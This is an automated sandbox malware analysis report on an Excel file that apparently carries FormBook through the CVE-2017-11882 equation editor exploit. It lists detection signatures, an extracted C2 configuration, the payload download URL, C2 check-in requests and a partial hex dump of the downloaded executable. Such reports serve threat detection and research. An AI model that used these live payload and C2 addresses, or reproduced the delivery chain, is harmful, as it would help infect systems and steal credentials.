Windows Analysis Report COAU7229898130.xlsx

Overview

General Information

Sample Name: COAU7229898130.xlsx
Analysis ID: 483666
MD5: 6440075843d5ae28dfccf6c9b09830c2
SHA1: fb5ea7b3defc0c15177429caaf45cdddd80cac7c
SHA256: 22c19360c2a9ee4aaa12439aa1c3ace0ecc3287e0b61481f21619e4bb69f5157
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.southerngiggle.com/imi7/"], "decoy": ["michaelhavemeyer.com", "surukuku.com", "happyhoneybaby.com", "carlsbadbeachwear.com", "mobiledepotrd.com", "cscclothing.com", "absolutalibertas.com", "gtof.net", "zahnspange-billstedt.com", "tuzlaekspertiz.net", "card05pay.site", "thebuilders24.com", "xs-of.com", "pempekgputra.com", "campverano.com", "tutorialscorner.net", "natconsultant.com", "dogloveya.com", "meatbasedlifestyle.com", "agamdesigners.com", "aashiyanafoundation.com", "confidentialbk.com", "snowbirdsrus.com", "lechouba.com", "popuality.com", "okulekitaplari.com", "blackwelldesignco.com", "abhayart.com", "ooftclub.com", "optima9.com", "neurohubapp.com", "plucknplace.com", "adbarista.com", "crownfoamus.com", "finalformlxp.com", "somethingnewstudio.com", "motorcyclejob.asia", "hasanmedicalservice.com", "thvsjwjvy.icu", "powerlinkme.com", "sceneinnyc.com", "onpointonlinemarketing.com", "abc-staff.com", "thinoft.com", "kamishichang.com", "aronexcorp.com", "garfld.com", "namasteezeindustries.com", "359326.com", "be530.com", "acceptedsolutions.net", "tuiseyingxiang.com", "thechikspot.com", "moneysavingkitchen.com", "valueplants.com", "casabedar.com", "biotechfla.com", "weekendclones.com", "tomrings.com", "nonamecreative.com", "streetracingscanner.com", "centerforcommonground.com", "download-apps.site", "sungoldhomeliving.com"]}
Multi AV Scanner detection for submitted file
Source: COAU7229898130.xlsx Virustotal: Detection: 35% Perma Link
Source: COAU7229898130.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://103.133.106.199/rbi/vbc.exe Avira URL Cloud: Label: malware
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514322943.0000000000549000.00000004.00000020.sdmp

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.359326.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.133.106.199:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.133.106.199:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 67MB

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 192.0.78.25:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thvsjwjvy.icu
Source: C:\Windows\explorer.exe Domain query: www.carlsbadbeachwear.com
Source: C:\Windows\explorer.exe Domain query: www.biotechfla.com
Source: C:\Windows\explorer.exe Network Connect: 154.91.1.126 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 47.91.170.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.359326.com
Source: C:\Windows\explorer.exe Domain query: www.absolutalibertas.com
Source: C:\Windows\explorer.exe Domain query: www.crownfoamus.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.southerngiggle.com/imi7/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz HTTP/1.1Host: www.thvsjwjvy.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz HTTP/1.1Host: www.biotechfla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz HTTP/1.1Host: www.absolutalibertas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.133.106.199 103.133.106.199
Source: Joe Sandbox View IP Address: 192.0.78.25 192.0.78.25
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 15 Sep 2021 09:13:26 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9Last-Modified: Wed, 15 Sep 2021 07:48:09 GMTETag: "a7e00-5cc03eb5c1717"Accept-Ranges: bytesContent-Length: 687616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 39 a5 41 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 0a 00 00 6e 00 00 00 00 00 00 22 2d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 2c 0a 00 4f 00 00 00 00 40 0a 00 a0 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 0d 0a 00 00 20 00 00 00 0e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 6b 00 00 00 40 0a 00 00 6c 00 00 00 10 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 2d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 00 9e 00 00 28 8d 01 00 03 00 00 00 51 01 00 06 28 2b 02 00 a8 01 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 92 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 0d 00 00 06 00 02 72 01 00 00 70 02 28 02 00 00 06 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 04 00 00 04 02 28 05 00 00 06 6f 17 00 00 0a 00 02 7b 05 00 00 04 72 15 00 00 70 02 28 03 00 00 06 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 06 00 00 04 02 28 06 00 00 06 6f 17 00 00 0a 00 02 7b 07 00 00 04 02 28 07 00 00 06 6f 17 00 00 0a 00 02 7b 08 00 00 04 02 28 04 00 00 06 6f 17 00 00 0a 00 2a 00 00 13 30 03 00 5f 00 00 00 01 00 00 11 00 28 18 00 00 0a d0 05 00 00 01 28 19 00 00 0a 16 6f 1a 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 29 00 06 16 9a 74 05 00 00 01 0c 08 6f 1b 00 00 0a 72 2d 00 00 70 28 1c 00 00 0a 0d 09 2c 0a 08 6f 1b 00 00 0a 13 04 2b 14 00 28 18 00 00 0a 6f 1d 00 00 0a 28 1e 00 00 0a 13 04 2b 00 11 04 2a 00 13 30 01 00 1a 00 00 00 02 00 00 11 00 28 18 00 00 0a 6f 1f 00 00 0a 6f 20 00 00 0a
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /rbi/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.106.199Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: unknown TCP traffic detected without corresponding DNS query: 103.133.106.199
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 09:14:52 GMTContent-Type: text/htmlContent-Length: 320Connection: closeETag: "595213ce-140"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 22 3e 0a 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 2f 70 61 72 6b 69 6e 67 22 3e 0a 3c 6e 6f 66 72 61 6d 65 73 3e 0a 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 0a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 2f 70 61 72 6b 69 6e 67 22 3e 6c 69 6e 6b 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><frameset rows="100%"><frame src="https://wanwang.aliyun.com/domain/parking"><noframes><body><script> <a href="https://wanwang.aliyun.com/domain/parking">link</a></body></noframes></frameset>
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.491485736.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: EBBD63B0.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: svchost.exe, 00000009.00000002.682029665.0000000001062000.00000004.00020000.sdmp String found in binary or memory: https://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXD
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBBD63B0.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.359326.com
Source: global traffic HTTP traffic detected: GET /rbi/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.133.106.199Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz HTTP/1.1Host: www.thvsjwjvy.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz HTTP/1.1Host: www.biotechfla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz HTTP/1.1Host: www.absolutalibertas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
